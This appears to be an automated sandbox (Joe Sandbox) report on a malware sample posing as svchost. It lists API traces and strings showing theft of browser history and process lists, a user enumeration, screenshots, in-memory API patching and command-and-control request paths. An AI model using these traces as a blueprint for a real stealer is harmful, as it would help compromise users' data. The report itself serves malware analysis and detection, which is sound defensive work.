                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,76F92F70,00000000), ref: 0264328E
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 02643297
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02656E07,?,?,76F92F70,00000000), ref: 026432A3
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 026432A6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,76F92F70,00000000), ref: 026432B6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 026432B9
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,76F92F70,00000000), ref: 026432C5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 026432C8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$memset$Name$CharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$AllocAllocateBackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                              • String ID: %02X$%53%59%53%54%45%4D%21%31%34%31%37%30%30%21%45%45%41%30%30%46%41%34$%s!%s!%08X$InstallDate$SYSTEM$SYSTEM!141700!EEA00FA4$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02644925
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0264494D
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,00000000,76F93490), ref: 02644987
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026449A9
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 026449B5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,IE history:,0000000C,026458F1,00000000), ref: 026449C9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 026449D7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026449EB
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 026449F7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685C1C,00000001,00000000,00000000), ref: 02644A0B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02644A19
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644A43
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02644A4F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02644A64
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02644A74
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644A88
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644A94
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02644AA8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644AB6
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02644AD5
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02644AEC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0265A376
                                                                                                                                                                                                              • GetThreadPriority.KERNEL32(00000000,?,0265A660,00000000,00000000,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A37D
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0265A386
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(0265A660,00000008,00000040,?,?,0265A660,00000000,00000000,?,?,?,?,?,?,026598DA,00000000), ref: 0265A3A7
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 0265A3C6
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 0265A3E2
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000000,00000004), ref: 0265A3F8
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 0265A406
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,00000000), ref: 0265A411
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 0265A424
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 0265A435
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 0265A444
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 0265A453
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 0265A462
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000006,?), ref: 0265A46A
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 0265A47D
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 0265A48E
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 0265A49D
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,00000000), ref: 0265A4A9
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 0265A4B3
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0265A4BB
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 0265A4C2
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0265A4FE
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 0265A505
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(0265A660,00000008,00000000,0265A660), ref: 0265A51F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2984368831-0
                                                                                                                                                                                                              • Opcode ID: 209df894b7ec3255ca92511fcc3051bfe51004f73133136da7e93de04fbd4ba3
                                                                                                                                                                                                              • Instruction ID: f78522eba1290b1dac0137899f5e391adb65215cdc36adc6da78365b8f3f942d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 209df894b7ec3255ca92511fcc3051bfe51004f73133136da7e93de04fbd4ba3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50518271940229BFE711AF74CC46FAE77ACFF49710F154928F982E7280DB7899518BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                              • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                              • API String ID: 33631002-3172865025
                                                                                                                                                                                                              • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02644503
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,76F93490), ref: 0264450E
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 02644531
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0264454D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02644567
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 026445A0
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026445A7
                                                                                                                                                                                                              • memset.MSVCRT ref: 026445BB
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,00000000,?), ref: 026445EC
                                                                                                                                                                                                              • GetModuleFileNameExA.KERNELBASE(00000000,00000000,?,00000104,?,?,?,?,00000000,?), ref: 02644603
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0264466C
                                                                                                                                                                                                              • Process32Next.KERNEL32(?,?), ref: 0264467B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleHeapProcessProcess32memset$AllocCloseCreateFileFirstInformationModuleNameNextOpenSnapshotToolhelp32_snprintf
                                                                                                                                                                                                              • String ID: %d%s$[System Process]$taskmgr{PIDProcess name
                                                                                                                                                                                                              • API String ID: 3808533164-4214784430
                                                                                                                                                                                                              • Opcode ID: 7e3ebfac28aa828444488b4523b776b4573f28dd6d3ee70096614f292c3b04e3
                                                                                                                                                                                                              • Instruction ID: be31d190d223f75ca73a9b3371a445000488ad7e7952b27479a9e578795c0b2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e3ebfac28aa828444488b4523b776b4573f28dd6d3ee70096614f292c3b04e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF61F271904345AFD700DF64DC99BABBBE9AF84354F559A68F8C687240EF70D808CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileType.KERNEL32(?,00000000,00000000), ref: 02668899
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 026688B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleInformationType
                                                                                                                                                                                                              • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                              • API String ID: 4064226416-1748840775
                                                                                                                                                                                                              • Opcode ID: abdfc6b347eab7f8eb58b6c510d818b90667823f54fee061cf6612e170bf428a
                                                                                                                                                                                                              • Instruction ID: af8ef3f57ac9239448e3df53aab8bc24a555d7029af06c3cf9e492f55d1d4bdf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: abdfc6b347eab7f8eb58b6c510d818b90667823f54fee061cf6612e170bf428a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC518071D40218ABEB24CFA8DC89BFEBB78FB44704F544529FA05EB280D7749944CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,76F93490,?,?,?,?,02645903,00000000), ref: 0264475A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02645903,00000000,00000000,00000000), ref: 026447A5
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,02645903,00000000,00000000,00000000), ref: 026447AC
                                                                                                                                                                                                              • memset.MSVCRT ref: 026447BF
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0264480A
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02645903,00000000,00000000), ref: 02644841
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644884
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,02645904,00000000), ref: 02644896
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02645903,02645904,00000000,00000000), ref: 026448A8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,02645904,00000000), ref: 026448B8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02645903), ref: 026448C7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026448CA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02645903), ref: 026448D7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026448DA
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02645903,00000000,00000000,00000000), ref: 026448ED
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$FreeProcess$Buffer$AllocDisplayInformationLockPointerQueryUnlockValidateWrite_snprintfmemset
                                                                                                                                                                                                              • String ID: %S$netuser{
                                                                                                                                                                                                              • API String ID: 37011087-3648794683
                                                                                                                                                                                                              • Opcode ID: 7bb07eebd21a6ffff5fa27760bebeed5dba8842a3f2df99edb24e3375aaef927
                                                                                                                                                                                                              • Instruction ID: df23329ab300c254dbc4f4af004aea17e9d148544b5478e741d72cad2b72e81b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bb07eebd21a6ffff5fa27760bebeed5dba8842a3f2df99edb24e3375aaef927
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D851D075E40255ABDB108FA4DC99FEEBBB8EB49700F508654F941A7380EF70D940CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D3A4), ref: 02643DED
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D3A4), ref: 02643E23
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D3A4), ref: 02643E57
                                                                                                                                                                                                              • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd;MMM;yyyy,?,00000104), ref: 02643EA0
                                                                                                                                                                                                              • GetTimeFormatA.KERNELBASE(00000409,00000000,00000000,HH;mm;ss,?,00000104), ref: 02643EC0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02643EE5
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D3A4), ref: 02643F37
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D3A4), ref: 02643FB7
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D3A4,00000000,?), ref: 0264404B
                                                                                                                                                                                                                • Part of subcall function 026539D0: EnterCriticalSection.KERNEL32(0268FB68,76F90F00,00000000,76F92F00), ref: 026539E9
                                                                                                                                                                                                                • Part of subcall function 026539D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 026539FB
                                                                                                                                                                                                                • Part of subcall function 026539D0: _snprintf.MSVCRT ref: 02653A1B
                                                                                                                                                                                                                • Part of subcall function 026539D0: SetCurrentDirectoryA.KERNEL32(?), ref: 02653A2B
                                                                                                                                                                                                                • Part of subcall function 026539D0: PathAddBackslashA.SHLWAPI(?), ref: 02653B00
                                                                                                                                                                                                                • Part of subcall function 026479C0: SetFileAttributesA.KERNEL32(00000000,00000000,02658ECD,?,?,?,?,?,?), ref: 026479C8
                                                                                                                                                                                                                • Part of subcall function 026479C0: DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 026479CF
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02644072
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BackslashPath$CurrentDirectoryFileFormat_snprintf$AttributesCriticalDateDeleteEnterFreeSectionTimeVirtual
                                                                                                                                                                                                              • String ID: DEBUG$HH;mm;ss$dd;MMM;yyyy$debug_%s_%s.log$scr.bmp$sysinfo.log
                                                                                                                                                                                                              • API String ID: 203013662-44577846
                                                                                                                                                                                                              • Opcode ID: bb1fb45829d5c99061ec736ccef240e8bf1816d434de53e4508d4daac18cac22
                                                                                                                                                                                                              • Instruction ID: 33da6a7ebad7cddb78e2dea946b30ce48a751407c58cdcd58abe7115181ae19d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb1fb45829d5c99061ec736ccef240e8bf1816d434de53e4508d4daac18cac22
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 077139316006465BDF15EA385CA57EABBE6AF46300F6446D8E8CADB340DF719A58CB80
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$strstrstrtol
                                                                                                                                                                                                              • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                              • API String ID: 600650289-3097137778
                                                                                                                                                                                                              • Opcode ID: eb3a3ce386bc0a4ac2e3c3d3ac831e765f811a74ca436282bb725c86d3131c06
                                                                                                                                                                                                              • Instruction ID: a0448fb1381c9b618a855c86241451c686a704270105b651a527185cb47d1bb0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb3a3ce386bc0a4ac2e3c3d3ac831e765f811a74ca436282bb725c86d3131c06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B771BD30E443446BDB25DB78DC80BDE7BB9AF49300F1046A8E989E7380E7745B85CB54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02653821
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265383C
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,76F90F00,00000000,00000000), ref: 02653856
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?,?,?,?,76F90F00,00000000,00000000), ref: 0265386C
                                                                                                                                                                                                                • Part of subcall function 02646C70: memset.MSVCRT ref: 02646CA1
                                                                                                                                                                                                                • Part of subcall function 02646C70: memset.MSVCRT ref: 02646CBF
                                                                                                                                                                                                                • Part of subcall function 02646C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02646CDB
                                                                                                                                                                                                                • Part of subcall function 02646C70: RegQueryValueExA.KERNEL32(?,75775DDDa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02646D02
                                                                                                                                                                                                                • Part of subcall function 02646C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02646D7A
                                                                                                                                                                                                                • Part of subcall function 02646C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02646D81
                                                                                                                                                                                                                • Part of subcall function 02646C70: memset.MSVCRT ref: 02646D95
                                                                                                                                                                                                                • Part of subcall function 02646C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02646DAE
                                                                                                                                                                                                                • Part of subcall function 02646C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02646DBC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 026538BB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 026538C2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 026538CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 026538D5
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000001,00000000,00000000,/topic.php,?,00000001,00000001,00000001,00000000,00000001,?,?,?,76F90F00), ref: 0265394D
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,76F90F00,00000000,00000000), ref: 0265395A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 02653998
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 0265399B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 026539A7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 026539AA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$File$FreeTempValidate$AllocAttributesCloseDeleteNameOpenPathQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: /topic.php
                                                                                                                                                                                                              • API String ID: 870369024-224703247
                                                                                                                                                                                                              • Opcode ID: aede83505e8d44f8117a41c26d50cffa2a2c4476b5e62eb1221b70c179ba2898
                                                                                                                                                                                                              • Instruction ID: 8194cb50291c09a0a497e8bdfc8e0a714812a0484c3c6313a72422a7f10420cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aede83505e8d44f8117a41c26d50cffa2a2c4476b5e62eb1221b70c179ba2898
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD512AB29401287FDB249E749C98EEFBF7CEB44740F444A99F942D6340EB758D948BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 0265A1CA
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 0265A1D7
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0265A1F4
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00019E40,?,00000000,00000000), ref: 0265A23E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265A256
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265A267
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0265A279
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 0265A291
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0265A2B1
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 0265A327
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0265A334
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: %53%59%53%54%45%4D%21%31%34%31%37%30%30%21%45%45%41%30%30%46%41%34$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                              • API String ID: 1291007772-645231788
